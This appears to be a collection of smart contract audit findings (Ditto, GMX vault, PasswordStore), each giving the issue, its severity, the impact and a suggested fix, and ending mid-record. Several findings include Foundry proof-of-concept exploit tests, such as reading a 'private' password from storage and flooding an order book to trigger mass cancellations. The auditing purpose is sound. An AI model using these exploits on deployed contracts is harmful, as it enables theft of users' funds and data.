```\\n function svTokenValue(GMXTypes.Store storage self) public view returns (uint256) {\\n uint256 equityValue_ = equityValue(self);\\n uint256 totalSupply_ = IERC20(address(self.vault)).totalSupply();\\n if (equityValue_ == 0 || totalSupply_ == 0) return SAFE_MULTIPLIER;\\n return equityValue_ * SAFE_MULTIPLIER / totalSupply_;\\n }\\n```\\n
The `afterWithdrawChecks` check applies only if the user withdraws in tokenA/B
high
The `afterWithdrawChecks` check is important to make sure key health parameters stay within their proper ranges. But the check sits inside the body of the `if user wants to withdraw in tokenA/B` statement, so when the user withdraws the LP token the check is not performed. This can cause unexpected financial losses.\\nThe `afterWithdrawChecks` check is placed inside the body of the if-statement of the `GMXProcessWithdraw.processWithdraw` function. This statement checks `if user wants to withdraw in tokenA/B`. In the other cases the `afterWithdrawChecks` check is not performed, but should be.\\n```\\n 69 // Else if user wants to withdraw in LP token, the tokensToUser is already previously\\n 70 // set in GMXWithdraw.withdraw()\\n 71 if (\\n 72 self.withdrawCache.withdrawParams.token == address(self.tokenA) ||\\n 73 self.withdrawCache.withdrawParams.token == address(self.tokenB)\\n 74 ) {\\n\\n104 GMXChecks.afterWithdrawChecks(self);\\n105 }\\n106 } \\n```\\n
The check should be placed after the closing bracket of the if-statement so that it also runs for LP-token withdrawals.
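A sketch of the suggested placement in `GMXProcessWithdraw.processWithdraw` (the elided swap logic is unchanged):\\n```\\nif (\\n self.withdrawCache.withdrawParams.token == address(self.tokenA) ||\\n self.withdrawCache.withdrawParams.token == address(self.tokenB)\\n) {\\n // ... swap to the requested token ...\\n}\\n// moved outside the if-block so it also runs when the user withdraws LP tokens\\nGMXChecks.afterWithdrawChecks(self);\\n```\\n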
The issue can cause unexpected financial losses.\\nTools used\\nManual Review
```\\n 69 // Else if user wants to withdraw in LP token, the tokensToUser is already previously\\n 70 // set in GMXWithdraw.withdraw()\\n 71 if (\\n 72 self.withdrawCache.withdrawParams.token == address(self.tokenA) ||\\n 73 self.withdrawCache.withdrawParams.token == address(self.tokenB)\\n 74 ) {\\n\\n104 GMXChecks.afterWithdrawChecks(self);\\n105 }\\n106 } \\n```\\n
Owner's password stored in the `s_password` state variable is not a secret and can be seen by everyone
high
The protocol is using a `private` state variable to store the owner's password under the assumption that, being a "private" variable, its value is a secret from everyone except the owner, which is a completely false assumption.\\nIn Solidity, marking a variable as `private` doesn't mean that the data stored in that variable is entirely secret or `private` from all observers of the blockchain. While it restricts direct external access to the variable from other contracts, it's essential to understand that the data on the blockchain is inherently transparent and can be viewed by anyone. Other smart contracts and blockchain explorers can still access and read the data if they know where to look.\\n'Private' in Solidity primarily provides encapsulation and access control within the contract itself, rather than offering complete data privacy on the public blockchain.\\n```\\nstring private s_password;\\n```\\n\\nShown above is the `s_password` variable, which the protocol assumes to be secret because it is a `private` variable. This is a completely false assumption since all data on the blockchain is public.\\nActors:\\nAttacker: Any non-owner malicious actor on the network.\\nVictim: Owner of the PasswordStore protocol.\\nProtocol: PasswordStore is meant to allow only the owner to store and retrieve their password securely.\\nWorking Test Case:\\n(Note: Though the following code fetches the Victim's password correctly in ASCII format, with my current skills in Solidity I've been struggling to make the `assertEq()` function return `true` when comparing the two strings. The problem seems to be with how the result of `abi.encodePacked()` for the `anyoneCanReadPassword` variable fetched from `vm.load` has a bunch of trailing zeroes in it while the same for `victimPassword` doesn't.\\nTherefore my current POC proves the exploit by using `console.log` instead of `assertEq`.)\\nWrite and run the following test case in the `PasswordStore.t.sol` test file.\\n```\\nfunction test_any_non_owner_can_see_password() public {\\n string memory victimPassword = "mySecretPassword"; // Defines Victim's (Owner's) password\\n vm.startPrank(owner); // Simulates Victim's address for the next call\\n passwordStore.setPassword(victimPassword); // Victim sets their password\\n\\n // At this point, Victim thinks their password is now "privately" stored on the protocol and is completely secret.\\n // The exploit code that now follows can be performed by anyone on the blockchain who is aware of the Victim's protocol, exposing the Victim's password.\\n\\n /////////// EXPLOIT CODE performed by Attacker ///////////\\n\\n // By observing the protocol's source code at `PasswordStore.sol`, we notice that `s_password` is the second storage variable declared in the contract. Since storage slots are allotted in the order of declaration in the EVM, its slot value will be '1'\\n uint256 S_PASSWORD_STORAGE_SLOT_VALUE = 1;\\n\\n // Access the protocol's storage data at slot 1\\n bytes32 slotData = vm.load(\\n address(passwordStore),\\n bytes32(S_PASSWORD_STORAGE_SLOT_VALUE)\\n );\\n\\n // Converting `bytes` data to `string`\\n string memory anyoneCanReadPassword = string(\\n abi.encodePacked(slotData)\\n );\\n // Exposes Victim's password on console\\n console.log(anyoneCanReadPassword);\\n}\\n```\\n\\nMake sure to run the test command with the `-vv` flag to see the `Logs` in the command output.
All data on the blockchain is public. To store sensitive information, additional encryption or off-chain solutions should be considered. Sensitive and personal data should never be stored on the blockchain in plaintext or weakly encrypted or encoded format.
This vulnerability completely compromises the confidentiality of the protocol and exposes the sensitive private data of the owner of the protocol to everyone on the blockchain.
```\\nstring private s_password;\\n```\\n
No check if bridge already exists
low
In the current `createBridge` function of the OwnerFacet.sol contract, a critical check to verify if the bridge already exists is missing. This omission can potentially result in double accounting in the yield generation process.\\nIn the rest of the OwnerFacet.sol contract functionality, there are checks in place to prevent the recreation of Vaults or Markets. However, this essential check is absent in the `createBridge()` function. The absence of this check can lead to the unintended creation of duplicate bridges, resulting in double accounting of yield if multiple vaults utilize the same bridge more than once. You can find the missing check in the code here: Link to code.\\nThe potential for double accounting of yield is evident in the following code block:\\n```\\nfunction getZethTotal(uint256 vault) internal view returns (uint256 zethTotal) {\\n AppStorage storage s = appStorage();\\n address[] storage bridges = s.vaultBridges[vault];\\n uint256 bridgeCount = bridges.length;\\n\\n for (uint256 i; i < bridgeCount;) {\\n zethTotal += IBridge(bridges[i]).getZethValue(); \\n unchecked {\\n ++i;\\n }\\n }\\n}\\n```\\n\\nTo demonstrate this behavior, a simple Proof of Concept (PoC) was created. (The test was placed in the Yield.t.sol file.)\\n```\\nfunction test_double_bridge_push() public {\\n vm.prank(owner);\\n diamond.createBridge(_bridgeReth, Vault.CARBON, 0, 0);\\n diamond.getUndistributedYield(Vault.CARBON); \\n assert(diamond.getUndistributedYield(Vault.CARBON) > 0); // As no yield was generated, this should not be true, but in current situation, it is a proof of double accounting.\\n}\\n```\\n
To address this vulnerability, it is recommended to add the following check to the createBridge function:\\n```diff\\n// rest of code\\n+ for (uint i = 0; i < s.vaultBridges[vault].length; i++) {\\n+   if (s.vaultBridges[vault][i] == bridge) {\\n+     revert Errors.BridgeAlreadyExist();\\n+   }\\n+ }\\n```\\n\\nThis change will prevent the inadvertent creation of duplicate bridges and mitigate the risk of double accounting of yield.
In specific circumstances, if a DAO proposal is confirmed, it could inadvertently trigger the creation of a bridge with the same address for a vault that already uses it. This scenario can lead to double accounting of yield and, as a consequence, potentially expose the protocol to vulnerabilities such as Denial of Service and yield theft.\\nHowever, it's important to note that the likelihood of this issue occurring is relatively low, and the function is governed by the DAO. After discussing this with the sponsor, we have classified this finding as low severity.
```\\nfunction getZethTotal(uint256 vault) internal view returns (uint256 zethTotal) {\\n AppStorage storage s = appStorage();\\n address[] storage bridges = s.vaultBridges[vault];\\n uint256 bridgeCount = bridges.length;\\n\\n for (uint256 i; i < bridgeCount;) {\\n zethTotal += IBridge(bridges[i]).getZethValue(); \\n unchecked {\\n ++i;\\n }\\n }\\n}\\n```\\n
Loss of precision in `twapPriceInEther` due to division before multiplication
low
When calculating `twapPriceInEther`, `twapPrice` is divided by 1e6 before the multiplication by 1e18 is done.\\n```\\n    function baseOracleCircuitBreaker(\\n        uint256 protocolPrice,\\n        uint80 roundId,\\n        int256 chainlinkPrice,\\n        uint256 timeStamp,\\n        uint256 chainlinkPriceInEth\\n    ) private view returns (uint256 _protocolPrice) {\\n    \\n    // more code\\n\\n       if (invalidFetchData || priceDeviation) {\\n            uint256 twapPrice = IDiamond(payable(address(this))).estimateWETHInUSDC(\\n                Constants.UNISWAP_WETH_BASE_AMT, 30 minutes\\n            );\\n            uint256 twapPriceInEther = (twapPrice / Constants.DECIMAL_USDC) * 1 ether;\\n```\\n\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/a93b4276420a092913f43169a353a6198d3c21b9/contracts/libraries/LibOracle.sol#L64-L85\\nAccording to the above calculation, the `twapPrice` obtained is precise up to 6 decimal places. Performing the division before multiplying by 1e18 results in a loss of this precision.\\nExample Scenario:\\n```\\ntwapPrice = 1902501929\\ntwapPriceInEther = 1902000000000000000000\\n\\n// if multiplication is performed earlier,\\ntwapPriceInEther = 1902501929000000000000\\n```\\n
Perform the multiplication before the division.\\n```\\ndiff --git a/contracts/libraries/LibOracle.sol b/contracts/libraries/LibOracle.sol\\nindex 23d1d0a..6962ad7 100644\\n--- a/contracts/libraries/LibOracle.sol\\n+++ b/contracts/libraries/LibOracle.sol\\n@@ -82,7 +82,7 @@ library LibOracle {\\n             uint256 twapPrice = IDiamond(payable(address(this))).estimateWETHInUSDC(\\n                 Constants.UNISWAP_WETH_BASE_AMT, 30 minutes\\n             );\\n-            uint256 twapPriceInEther = (twapPrice / Constants.DECIMAL_USDC) * 1 ether;\\n+            uint256 twapPriceInEther = (twapPrice * 1 ether) / Constants.DECIMAL_USDC;\\n             uint256 twapPriceInv = twapPriceInEther.inv();\\n             if (twapPriceInEther == 0) {\\n                 revert Errors.InvalidTwapPrice();\\n```\\n
The price used can be up to almost 1 unit (in 18 decimals) lower than the original price, because the fractional part of `twapPrice` is truncated away before scaling.
```\\n function baseOracleCircuitBreaker(\\n uint256 protocolPrice,\\n uint80 roundId,\\n int256 chainlinkPrice,\\n uint256 timeStamp,\\n uint256 chainlinkPriceInEth\\n ) private view returns (uint256 _protocolPrice) {\\n \\n // more code\\n\\n if (invalidFetchData || priceDeviation) {\\n uint256 twapPrice = IDiamond(payable(address(this))).estimateWETHInUSDC(\\n Constants.UNISWAP_WETH_BASE_AMT, 30 minutes\\n );\\n uint256 twapPriceInEther = (twapPrice / Constants.DECIMAL_USDC) * 1 ether;\\n```\\n
`onERC721Received()` callback is never called when new tokens are minted in Erc721Facet.sol
low
The ERC721Facet contract does not properly call the corresponding callback when new tokens are minted. The ERC721 standard states that the onERC721Received callback must be called when a mint or transfer operation occurs. However, the smart contracts interacting as users with `Erc721Facet.mintNFT()` will not be notified with the onERC721Received callback, as expected according to the ERC721 standard.\\n`onErc721Received()` isn't called on minting:\\n```\\n function mintNFT(address asset, uint8 shortRecordId)\\n external\\n isNotFrozen(asset)\\n nonReentrant\\n onlyValidShortRecord(asset, msg.sender, shortRecordId)\\n {\\n if (shortRecordId == Constants.SHORT_MAX_ID) {\\n revert Errors.CannotMintLastShortRecord();\\n }\\n STypes.ShortRecord storage short =\\n s.shortRecords[asset][msg.sender][shortRecordId];\\n\\n if (short.tokenId != 0) revert Errors.AlreadyMinted();\\n\\n s.nftMapping[s.tokenIdCounter] = STypes.NFT({\\n owner: msg.sender,\\n assetId: s.asset[asset].assetId,\\n shortRecordId: shortRecordId\\n });\\n\\n short.tokenId = s.tokenIdCounter;\\n\\n //@dev never decreases\\n s.tokenIdCounter += 1;\\n }\\n```\\n
Call `onERC721Received()` on the recipient when minting to a contract, following the standard safe-mint pattern (see the sketch below).
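A minimal sketch of that pattern, mirroring OpenZeppelin's `_checkOnERC721Received`; the `Errors.InvalidReceiver` error name is an assumption:\\n```\\nimport {IERC721Receiver} from "@openzeppelin/contracts/token/ERC721/IERC721Receiver.sol";\\n\\nfunction _checkOnERC721Received(address to, uint256 tokenId) private {\\n    if (to.code.length > 0) {\\n        // A contract receiver must acknowledge the mint, per ERC-721 safe-transfer semantics\\n        try IERC721Receiver(to).onERC721Received(msg.sender, address(0), tokenId, "")\\n        returns (bytes4 retval) {\\n            if (retval != IERC721Receiver.onERC721Received.selector) {\\n                revert Errors.InvalidReceiver(); // hypothetical error\\n            }\\n        } catch {\\n            revert Errors.InvalidReceiver(); // hypothetical error\\n        }\\n    }\\n}\\n```\\nCalling this helper at the end of `mintNFT` would notify contract recipients without affecting EOA users.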
It can create interoperability issues with users' contracts
```\\n function mintNFT(address asset, uint8 shortRecordId)\\n external\\n isNotFrozen(asset)\\n nonReentrant\\n onlyValidShortRecord(asset, msg.sender, shortRecordId)\\n {\\n if (shortRecordId == Constants.SHORT_MAX_ID) {\\n revert Errors.CannotMintLastShortRecord();\\n }\\n STypes.ShortRecord storage short =\\n s.shortRecords[asset][msg.sender][shortRecordId];\\n\\n if (short.tokenId != 0) revert Errors.AlreadyMinted();\\n\\n s.nftMapping[s.tokenIdCounter] = STypes.NFT({\\n owner: msg.sender,\\n assetId: s.asset[asset].assetId,\\n shortRecordId: shortRecordId\\n });\\n\\n short.tokenId = s.tokenIdCounter;\\n\\n //@dev never decreases\\n s.tokenIdCounter += 1;\\n }\\n```\\n
[L-4] Yield update will not happen at the 1k ETH threshold
low
Yield updates happen for a vault when the `BRIDGE_YIELD_UPDATE_THRESHOLD` is met for the vault after a large bridge deposit. The `maybeUpdateYield` function handles this logic for updates when that happens (1000 ETH to be exact).\\nThreshold constant from:\\n```\\nFILE: 2023-09-ditto/contracts/libraries/Constants.sol\\n\\nLine 17:\\nuint256 internal constant BRIDGE_YIELD_UPDATE_THRESHOLD = 1000 ether;\\n\\nLine 18:\\nuint256 internal constant BRIDGE_YIELD_PERCENT_THRESHOLD = 0.01 ether; // 1%\\n```\\n\\n```\\nFILE: 2023-09-ditto/contracts/facets/BridgeRouterFacet.sol\\n\\nfunction maybeUpdateYield(uint256 vault, uint88 amount) private {\\n uint88 zethTotal = s.vault[vault].zethTotal;\\n if (\\n zethTotal > Constants.BRIDGE_YIELD_UPDATE_THRESHOLD\\n && amount.div(zethTotal) > Constants.BRIDGE_YIELD_PERCENT_THRESHOLD\\n ) { // @audit should be >= to account for when threshold is met\\n // Update yield for "large" bridge deposits\\n vault.updateYield();\\n }\\n }\\n```\\n
Change the `>` operator in the `maybeUpdateYield` function to `>=`, as shown below.
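Applied to the function above, the fix is a two-character change (sketch; whether the percent comparison should also become inclusive depends on the intended semantics):\\n```\\n-            zethTotal > Constants.BRIDGE_YIELD_UPDATE_THRESHOLD\\n+            zethTotal >= Constants.BRIDGE_YIELD_UPDATE_THRESHOLD\\n```\\n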
In reality the yield update for the vault will not happen in the instances of 1000 ETH deposits unless the bridge deposit amount into the vault is > 1000 ETH and the percent is greater than 1%.
```\\nFILE: 2023-09-ditto/contracts/libraries/Constants.sol\\n\\nLine 17:\\nuint256 internal constant BRIDGE_YIELD_UPDATE_THRESHOLD = 1000 ether;\\n\\nLine 18:\\nuint256 internal constant BRIDGE_YIELD_PERCENT_THRESHOLD = 0.01 ether; // 1%\\n```\\n
If the DAO removes a bridge, users' deposited tokens for that bridge will be lost.
low
If the DAO removes a bridge for any (non-malicious) reason, users' deposited tokens for that bridge will be lost.\\nIn `OwnerFacet.sol`, the DAO of the system has the option to remove a bridge by calling the `deleteBridge()` function. There is no check if there are any assets in the bridge. Also, users may deposit funds in the bridge during the voting period.\\nPOC: Add the following function to `BridgeRouter.t.sol`\\n```\\nfunction test_DeleteBridgeWithAssets() public {\\n        console.log("Sender ethEscrowed in vault 2 before deposit: ", diamond.getVaultUserStruct(2, sender).ethEscrowed);\\n        deal(_rethA, sender, 10000 ether);\\n\\n        vm.startPrank(sender);\\n        uint88 deposit1 = 1000 ether;\\n        uint88 withdrawAmount = 100 ether;\\n        diamond.deposit(_bridgeRethToBeDeleted, deposit1);\\n        console.log("Sender ethEscrowed in vault2 after deposit: ", diamond.getVaultUserStruct(2, sender).ethEscrowed);\\n        diamond.withdraw(_bridgeRethToBeDeleted, withdrawAmount);\\n        console.log("Sender ethEscrowed after withdraw: ", diamond.getVaultUserStruct(2, sender).ethEscrowed);\\n        vm.stopPrank();\\n\\n        console.log("Balance of reth in the bridgeRethToBeDeleted: ", rethA.balanceOf(_bridgeRethToBeDeleted));\\n\\n        /// INFO: DAO deletes the bridge after a vote has been passed\\n        vm.startPrank(owner) ;\\n        diamond.deleteBridge(_bridgeRethToBeDeleted);\\n        vm.stopPrank();\\n\\n        vm.startPrank(sender);\\n        vm.expectRevert();\\n        diamond.withdraw(_bridgeRethToBeDeleted, withdrawAmount);\\n        console.log("Balance of reth in the bridgeRethToBeDeleted: ", rethA.balanceOf(_bridgeRethToBeDeleted));\\n        vm.stopPrank();\\n    }\\n```\\n\\nIn order to run this test, you also have to add\\n```\\n rethA.approve(\\n            _bridgeRethToBeDeleted,\\n            0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\\n        );\\n```\\n\\nto the `setUp()` function of the `BridgeRouter.t.sol` contract.\\nIn `DeployHelper.sol` another bridge and vault have to be added in order for the test to run:\\n```\\n/// INFO: added by auditor\\n    IBridge public bridgeRethToBeDeleted;\\n    address public _bridgeRethToBeDeleted;\\n    IAsset public zethToBeDeletedVault;\\n    address public _zethToBeDeletedVault;\\n    IRocketStorage public rocketStorageA;\\n    address public _rocketStorageA;\\n    IRocketTokenRETH public rethA;\\n    address public _rethA;\\n```\\n\\nAdd the following to the `deployContracts()` function\\n```\\nif (chainId == 31337) {\\n            //mocks\\n            _immutableCreate2Factory = deployCode("ImmutableCreate2Factory.sol");\\n\\n            if (isMock) {\\n                _steth = deployCode("STETH.sol");\\n                _unsteth = deployCode("UNSTETH.sol", abi.encode(_steth));\\n                _rocketStorage = deployCode("RocketStorage.sol");\\n                _reth = deployCode("RocketTokenRETH.sol");\\n                reth = IRocketTokenRETH(_reth);\\n                _ethAggregator = deployCode("MockAggregatorV3.sol");\\n                /// INFO: added by auditor\\n                _rocketStorageA = deployCode("RocketStorage.sol");\\n                _rethA = deployCode("RocketTokenRETH.sol");\\n                rethA = IRocketTokenRETH(_rethA);\\n            }\\n\\n            rocketStorage = IRocketStorage(_rocketStorage);\\n            /// INFO: added by auditor\\n            rocketStorageA = IRocketStorage(_rocketStorageA);\\n            steth = ISTETH(_steth);\\n            unsteth = IUNSTETH(payable(_unsteth));\\n            ethAggregator = IMockAggregatorV3(_ethAggregator);\\n        }\\n\\n/// INFO: Added by auditor \\n        _zethToBeDeletedVault = factory.safeCreate2(\\n            salt,\\n            abi.encodePacked(\\n                vm.getCode("Asset.sol:Asset"), abi.encode(_diamond, "Zebra ETH Two", "ZETHT")\\n            )\\n        );\\n\\n        _bridgeRethToBeDeleted = factory.safeCreate2(\\n            salt,\\n            abi.encodePacked(\\n                vm.getCode("BridgeReth.sol:BridgeReth"),\\n 
abi.encode(_rocketStorageA, _diamond)\\n )\\n );\\n\\n bridgeRethToBeDeleted = IBridge(_bridgeRethToBeDeleted);\\n MTypes.CreateVaultParams memory vaultParams;\\n vaultParams.zethTithePercent = 10_00;\\n vaultParams.dittoMatchedRate = 1;\\n vaultParams.dittoShorterRate = 1;\\n diamond.createVault({zeth: _zeth, vault: Vault.CARBON, params: vaultParams});\\n\\n MTypes.CreateVaultParams memory vaultParamsTwo;\\n vaultParamsTwo.zethTithePercent = 9_00;\\n vaultParamsTwo.dittoMatchedRate = 1;\\n vaultParamsTwo.dittoShorterRate = 1;\\n zethToBeDeletedVault = IAsset(_zethToBeDeletedVault);\\n diamond.createVault({zeth: _zethToBeDeletedVault, vault: 2, params: vaultParamsTwo});\\n STypes.Vault memory carbonVaultConfigTwo = diamond.getVaultStruct(2);\\n assertEq(carbonVaultConfigTwo.zethTithePercent, 9_00);\\n\\n diamond.createBridge({\\n bridge: _bridgeRethToBeDeleted,\\n vault: 2,\\n withdrawalFee: 150,\\n unstakeFee: 0\\n });\\n \\n if (isMock) {\\n rocketStorage.setDeposit(_reth);\\n rocketStorage.setReth(_reth);\\n /// INFO: added by auditor\\n rocketStorageA.setDeposit(_rethA);\\n rocketStorageA.setReth(_rethA);\\n _setETH(4000 ether);\\n }\\n```\\n\\nTo run the test use `forge test -vvv --mt test_DeleteBridgeWithAsset`
In `deleteBridge()`, make sure the bridge contract no longer holds any assets before removing it (see the sketch below).
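A minimal sketch of such a guard; the access-control modifier and the `BridgeStillHoldsAssets` error name are assumptions:\\n```\\nfunction deleteBridge(address bridge) external onlyDAO {\\n    // Refuse to remove a bridge that still custodies user funds\\n    if (IBridge(bridge).getZethValue() != 0) {\\n        revert Errors.BridgeStillHoldsAssets(); // hypothetical error\\n    }\\n    // ... existing removal logic ...\\n}\\n```\\nAlternatively, the DAO could be required to first migrate or distribute the bridge's balance before deletion.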
Users' deposited `RETH` or `STETH` in that bridge will be lost, as they have no way to withdraw them: the withdraw functions can only be called through `Diamond.sol`.
```\\nfunction test_DeleteBridgeWithAssets() public {\\n console.log("Sender ethEscrowed in vault 2 before deposit: ", diamond.getVaultUserStruct(2, sender).ethEscrowed);\\n deal(_rethA, sender, 10000 ether);\\n\\n vm.startPrank(sender);\\n uint88 deposit1 = 1000 ether;\\n uint88 withdrawAmount = 100 ether;\\n diamond.deposit(_bridgeRethToBeDeleted, deposit1);\\n console.log("Sender ethEscrowed in vault2 after deposit: ", diamond.getVaultUserStruct(2, sender).ethEscrowed);\\n diamond.withdraw(_bridgeRethToBeDeleted, withdrawAmount);\\n console.log("Sender ethEscrowed after withdraw: ", diamond.getVaultUserStruct(2, sender).ethEscrowed);\\n vm.stopPrank();\\n\\n console.log("Balance of reth in the bridgeRethToBeDeleted: ", rethA.balanceOf(_bridgeRethToBeDeleted));\\n\\n /// INFO: DAO deletes the bridge after a vote has been passed\\n vm.startPrank(owner) ;\\n diamond.deleteBridge(_bridgeRethToBeDeleted);\\n vm.stopPrank();\\n\\n vm.startPrank(sender);\\n vm.expectRevert();\\n diamond.withdraw(_bridgeRethToBeDeleted, withdrawAmount);\\n console.log("Balance of reth in the bridgeRethToBeDeleted: ", rethA.balanceOf(_bridgeRethToBeDeleted));\\n vm.stopPrank();\\n }\\n```\\n
Users Lose Funds and Market Functionality Breaks When Market Reaches 65k Id
high
If the orderbook of any market reaches an orderId of 65,000, the DAO can call the function cancelOrderFarFromOracle multiple times to cancel many orders, up to 1000 orders in each transaction, and anyone can cancel the last order in one call. The users who issued the cancelled orders will lose their deposits, and the cancellation process is not limited to a certain number of orders.\\nSource: contracts/facets/OrderFacet.sol\\nFunction: cancelOrderFarFromOracle\\nWhenever a user creates a limit order (limit short, limit bid, limit ask), if the order does not match it gets added to the orderbook, and the `assets amount` or `eth amount` used to create this order is taken from the virtual balance of the user in the system,\\nuserVault (in the case of `bids` and shorts) or userAsset (in the case of asks). We can see that here:\\n` // for asks:\\n s.assetUser[asset][order.addr].ercEscrowed -= order.ercAmount;\\n // for `shorts` :\\n s.vaultUser[vault][order.addr].ethEscrowed -= eth;\\n //for `bids` :\\n s.vaultUser[vault][order.addr].ethEscrowed -= eth;`\\nAlso, if there are no recycled ids behind the HEAD, the id for these orders is going to be the current id in s.asset[asset].orderId, and `s.asset[asset].orderId` gets incremented by one. This is true for all three types of orders (shorts, asks, bids).\\nNow, in case this orderId reaches 65k for a specific market, the DAO is able to cancel the last 1000 orders, and anyone can cancel the last order in one call, since the function only checks for orderId > 65000. By the last order I mean the last order of any type of limit order (asks, shorts, bids).\\n`function cancelOrderFarFromOracle(address asset, O orderType, uint16 lastOrderId, uint16 numOrdersToCancel)\\n    external\\n    onlyValidAsset(asset)\\n    nonReentrant\\n{\\n    if (s.asset[asset].orderId < 65000) {\\n        revert Errors.OrderIdCountTooLow();\\n    }\\n\\n    if (numOrdersToCancel > 1000) {\\n        revert Errors.CannotCancelMoreThan1000Orders();\\n    }\\n\\n    if (msg.sender == LibDiamond.diamondStorage().contractOwner) {\\n        if (orderType == O.LimitBid && s.bids[asset][lastOrderId].nextId == Constants.TAIL) {\\n            s.bids.cancelManyOrders(asset, lastOrderId, numOrdersToCancel);\\n        } else if (orderType == O.LimitAsk && s.asks[asset][lastOrderId].nextId == Constants.TAIL) {\\n            s.asks.cancelManyOrders(asset, lastOrderId, numOrdersToCancel);\\n        } else if (orderType == O.LimitShort && s.shorts[asset][lastOrderId].nextId == Constants.TAIL) {\\n            s.shorts.cancelManyOrders(asset, lastOrderId, numOrdersToCancel);\\n        } else {\\n            revert Errors.NotLastOrder();\\n        }\\n    } else {\\n        //@dev if address is not DAO, you can only cancel last order of a side\\n        if (orderType == O.LimitBid && s.bids[asset][lastOrderId].nextId == Constants.TAIL) {\\n            s.bids.cancelOrder(asset, lastOrderId);\\n        } else if (orderType == O.LimitAsk && s.asks[asset][lastOrderId].nextId == Constants.TAIL) {\\n            s.asks.cancelOrder(asset, lastOrderId);\\n        } else if (orderType == O.LimitShort && s.shorts[asset][lastOrderId].nextId == Constants.TAIL) {\\n            s.shorts.cancelOrder(asset, lastOrderId);\\n        } else {\\n            revert Errors.NotLastOrder();\\n        }\\n    }\\n}\\n...\\n....\\n// cancelManyOrders performs no extra checks:\\nfunction cancelManyOrders(\\n        mapping(address => mapping(uint16 => STypes.Order)) storage orders,\\n        address asset,\\n        uint16 lastOrderId,\\n        uint16 numOrdersToCancel\\n    ) internal {\\n        uint16 prevId;\\n        uint16 currentId = lastOrderId;\\n        for (uint8 i; i < numOrdersToCancel;) {\\n            prevId = orders[asset][currentId].prevId;\\n            LibOrders.cancelOrder(orders, asset, currentId);\\n            currentId = prevId;\\n            unchecked {\\n                ++i;\\n            }\\n        }\\n}\\n...... .....\\n// no extra checks in the cancelOrder() function either: it sets the order to Cancelled, removes it from the list, and marks it to be reused:\\nfunction cancelOrder(mapping(address => mapping(uint16 => STypes.Order)) storage orders, address asset, uint16 id)\\n        internal\\n    {\\n        uint16 prevHEAD = orders[asset][Constants.HEAD].prevId;\\n\\n        // remove the links of ID in the market\\n        // @dev (ID) is exiting, [ID] is inserted\\n        // BEFORE: PREV <-> (ID) <-> NEXT\\n        // AFTER : PREV <----------> NEXT\\n        orders[asset][orders[asset][id].nextId].prevId = orders[asset][id].prevId;\\n        orders[asset][orders[asset][id].prevId].nextId = orders[asset][id].nextId;\\n\\n        // create the links using the other side of the HEAD\\n        emit Events.CancelOrder(asset, id, orders[asset][id].orderType);\\n        _reuseOrderIds(orders, asset, id, prevHEAD, O.Cancelled);\\n}`\\nAs we said, the user's balance gets decreased by the `value` of the order they created, but since the order is set to Cancelled, the user is never able to receive that amount back, because cancelled orders can neither be matched nor cancelled again.\\nEx:\\nA user creates a limit bid as follows: {price: 0.0001 ether, amount: 10000 ether}.\\nWhen this order gets cancelled, the user will lose: 0.0001 * 10000 = `1 ether` ZETH (or ETH).\\nShorters will lose more than others since their balance gets decreased by: PRICE * AMOUNT * MARGIN.\\nThe second issue is that there is no limit on how many orders can be cancelled. You can cancel all the orders in a market that reaches a 65K `orderId` (limit `shorts`, limit `asks` or limit `bids`), starting from the last one, since the only condition to be able to cancel orders is that the asset orderId reached this number, and once it reaches it, it never decreases, even if there are a lot of orders behind the HEAD (non-active) waiting to be reused.\\nA malicious actor can target this vulnerability by creating numerous tiny limit `asks`, pushing the `orderId` too high. He can do so by creating `asks` with a very high price and a very small amount so he can pass the `MinEth` amount check; with less than `1 cusd` (in the case of the cusd market) he can create a bunch of limit `asks` orders.\\nPOC:\\nUsing the main repo setup for testing, the following PoC shows how a malicious user can fill the orderbook with a bunch of tiny `limit asks` at little cost, how you can cancel all orders in case the orderId reaches 65k, and also that there is no refund for the users that created these orders.\\n```\\n// SPDX-License-Identifier: GPL-3.0-only\\npragma solidity 0.8.21;\\n\\nimport {Errors} from "contracts/libraries/Errors.sol";\\nimport {Events} from "contracts/libraries/Events.sol";\\nimport {STypes, MTypes, O} from "contracts/libraries/DataTypes.sol";\\nimport {Constants} from "contracts/libraries/Constants.sol";\\nimport "forge-std/console.sol";\\nimport {OBFixture} from "test/utils/OBFixture.sol";\\n// import {console} from "contracts/libraries/console.sol";\\n\\ncontract POC is OBFixture {\\n    address[3] private bidders = [address(435433), address(423432523), address(522366)];\\n    address[3] private shorters = [address(243422243242), address(52353646324532), address(40099)];\\n    address attacker = address(3234);\\n    function setUp() public override {\\n        super.setUp();\\n    }\\n\\n    // an attacker can fill the order book with a bunch of asks that have a very high price and a tiny amount\\n    function test_fillWithAsks() public {\\n        // create a bunch of asks with a high price:\\n        depositUsd(attacker, DEFAULT_AMOUNT * 10000);\\n        uint balanceAssetBefore = diamond.getAssetBalance(asset,attacker);\\n        // minAsk = 0.0001 ether . 0.0001 ether = x * 1 , x =0.0001 ether * 1 ether\\n        vm.startPrank(attacker);\\n        for (uint i ; i< 1000 ;i++){\\n            createLimitAsk( 10**24, 10**10); \\n        }\\n        vm.stopPrank();\\n        STypes.Order[] memory asks = diamond.getAsks(asset);\\n        console.log("tiny asks created : ", asks.length);\\n        console.log( "hack cost asset", balanceAssetBefore - diamond.getAssetBalance(asset,attacker));\\n\\n    }\\n    function test_cancleOrders() public {\\n        //set the asset orderId to 64998\\n        diamond.setOrderIdT(asset,64998);\\n        // create multiple bids and 1 short\\n        fundLimitBidOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, bidders[0]); // id 64998\\n        fundLimitShortOpt(uint80(DEFAULT_PRICE)*4, DEFAULT_AMOUNT, shorters[0]); //id 64999\\n        fundLimitBidOpt(DEFAULT_PRICE*2, DEFAULT_AMOUNT, bidders[1]); // id 65000\\n        fundLimitBidOpt(DEFAULT_PRICE*3 , DEFAULT_AMOUNT, bidders[2]); //id 65001\\n        /* now we have the lists like this :\\n        - for bids : Head <- Head <->65001<->65000<->64998->Tail\\n        - for shorts: Head <- Head <->64999->Tail\\n        */\\n\\n        // let's cancel all the bids:\\n        canclebid(64998);\\n        // - now : Head <-64998<-> Head <->65001<->65000->Tail\\n        uint s1 = vm.snapshot();\\n        vm.revertTo(s1);\\n        canclebid(65000);\\n        // - now : Head <-64998<->65000<-> Head <->65001->Tail\\n        uint s2 = vm.snapshot();\\n        vm.revertTo(s2);\\n        canclebid(65001);\\n        // - now : Head <-64998<->65000<->65001<-> Head ->Tail\\n        // let's check the 